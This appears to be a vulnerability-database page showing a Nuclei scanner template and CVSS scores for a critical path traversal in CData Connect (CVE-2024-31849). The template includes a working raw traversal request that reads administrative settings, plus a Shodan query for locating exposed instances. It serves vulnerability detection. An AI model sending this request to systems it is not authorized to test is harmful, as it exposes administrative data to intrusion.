Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2024-31849
HistoryApr 29, 2024 - 7:35 a.m.

CData Connect < 23.4.8846 - Path Traversal

2024-04-2907:35:42
ProjectDiscovery
github.com
75
java
vulnerability
remote
attacker
administrative access

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.6

Confidence

High

EPSS

0.013

Percentile

85.7%

A path traversal vulnerability exists in the Java version of CData Connect &lt; 23.4.8846 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.
id: CVE-2024-31849

info:
  name: CData Connect < 23.4.8846 - Path Traversal
  author: DhiyaneshDK
  severity: critical
  description: |
    A path traversal vulnerability exists in the Java version of CData Connect < 23.4.8846 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.
  reference:
    - https://www.tenable.com/security/research/tra-2024-09
    - https://www.cdata.com/kb/entries/jetty-cve-0324.rst
    - https://nvd.nist.gov/vuln/detail/CVE-2024-31849
    - https://github.com/Ostorlab/KEV
    - https://github.com/Stuub/CVE-2024-31848-PoC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-31849
    cwe-id: CWE-22
    epss-score: 0.00053
    epss-percentile: 0.21091
  metadata:
    verified: true
    max-request: 2
    shodan-query: "title:\"CData Connect\""
  tags: cve,cve2024,cdata,lfi
flow: http(1) && http(2)

http:
  - method: GET
    path:
      - '{{BaseURL}}/login.rst'

    matchers:
      - type: word
        internal: true
        words:
          - 'CData - Connect'

  - raw:
      - |
        GET /ui/..\src\getSettings.rsb?@json HTTP/1.1
        Host: {{Hostname}}
        Referer: {{RootURL}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"items":[{'
          - ':"true"'
          - 'notifyemail'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c377b55013c499dc07d8fb55d4358d50ac1592dd053759aa2583a3e6ad9aba85022054b63bed022c6de67a1b2dd3684efd8c746747afe322a61d2928c1a92fc358fd:922c64590222798bb761d5b6d8e72950

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.6

Confidence

High

EPSS

0.013

Percentile

85.7%